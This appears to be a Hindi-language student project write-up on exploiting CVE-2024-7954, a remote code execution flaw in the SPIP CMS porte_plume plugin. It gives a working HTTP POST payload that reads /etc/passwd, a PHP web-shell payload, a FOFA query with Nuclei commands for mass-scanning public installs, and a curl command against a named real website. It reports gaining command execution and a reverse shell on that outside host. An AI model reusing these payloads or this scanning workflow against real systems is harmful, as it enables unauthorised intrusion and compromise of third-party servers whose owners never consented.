
Exploitation of a Remote Code Execution vulnerability- (CVE-2024-7954)
सॉफ्टवेयर भेद्यता परीक्षण परियोजना प्रस्तुतकर्ता: शिवांश कुंतल
यह परियोजना CVE-2024-7954 के शोषण का प्रदर्शन करती है, जो SPIP CMS को इसके porte_plume प्लगइन के माध्यम से प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है।
यह भेद्यता अप्रमाणित हमलावरों को क्राफ्टेड HTTP POST अनुरोधों के माध्यम से लक्ष्य सर्वर पर मनमाना PHP कोड निष्पादित करने की अनुमति देती है।
परीक्षण एक नियंत्रित स्थानीय वातावरण में किया गया और बाद में FOFA और Nuclei का उपयोग करके वास्तविक दुनिया की टोह लेने के लिए विस्तारित किया गया।
SPIP CMS का एक भेद्य संस्करण, जो CVE-2024-7954 से प्रभावित होने की पुष्टि की गई है, को GitHub रिपॉजिटरी का उपयोग करके स्थानीय रूप से Apache सर्वर पर तैनात किया गया, जो ज्ञात-भेद्य रिलीज़ होस्ट करता है।
उपयोग किए गए उपकरण
localhost पर चल रहा SPIP होमपेज सफल स्थापना को मान्य करता है और शोषण के लक्ष्य के रूप में कार्य करता है।
porte_plume प्लगइन (संस्करण 4.30-alpha2, 4.2.13, 4.1.16 से पहले) उपयोगकर्ता द्वारा प्रदान किए गए इनपुट के अपर्याप्त स्वच्छता के कारण भेद्य है। हमलावर विशिष्ट फॉर्म फ़ील्ड में PHP कोड इंजेक्ट कर सकते हैं जो बाद में सर्वर द्वारा रेंडर और निष्पादित किया जाता है।
प्रभाव: अप्रमाणित रिमोट कोड निष्पादन गंभीरता: गंभीर हमला वेक्टर: नेटवर्क / HTTP POST
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded
data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB
सार्वजनिक SPIP इंस्टॉलेशन की गणना करने के लिए FOFA क्वेरी का उपयोग किया गया:
app="SPIP"
FOFA ने कई मेटाडेटा बिंदु लौटाए:
targets.txt में निर्यात करें।पहचान किया गया एक उपयुक्त वास्तविक दुनिया का होस्ट:
http://www.comite-tricolore.org/
चूंकि मैन्युअल शोषण धीमा है, इसलिए Nuclei का उपयोग बड़े लक्ष्य सेट पर CVE-2024-7954 का पता लगाने को स्वचालित करने के लिए किया गया।
nuclei -l targets.txt -t CVE-2024-7954.yaml
-l targets.txt FOFA परिणाम लोड करता है-t कस्टम PoC टेम्पलेट लोड करता हैनोट: प्रारंभिक टेम्पलेट ने कोई मिलान नहीं लौटाया।
nuclei -l targets.txt -t cves/
इस स्कैन ने एक प्रतिक्रियाशील लक्ष्य की पहचान की:
http://www.comite-tricolore.org/
यहां जाएं:
http://www.comite-tricolore.org/spip.php?page=contact
पुष्टि की:
Burp Suite या curl का उपयोग करके, message पैरामीटर को संशोधित करें:
पेलोड
<?php system($_GET['cmd']); ?>
यहां जाएं:
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id
या curl का उपयोग करें:
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"
आउटपुट ने रिमोट कमांड निष्पादन की पुष्टि की।
एक क्राफ्टेड पेलोड रिवर्स शेल कॉलबैक को सक्षम करता है, जिससे अनुमति मिलती है:
whoamilsयह परियोजना CVE-2024-7954 के लिए टोही से लेकर इंटरैक्टिव शेल प्राप्त करने तक की पूर्ण शोषण श्रृंखला का प्रदर्शन करती है।
यह भेद्यता इस बात पर प्रकाश डालती है कि एक प्रतीत होने वाला हानिरहित टेक्स्ट फ़ॉर्मेटिंग प्लगइन, जब अनुचित रूप से सुरक्षित हो, तो एक पूर्ण सिस्टम समझौता कैसे बना सकता है।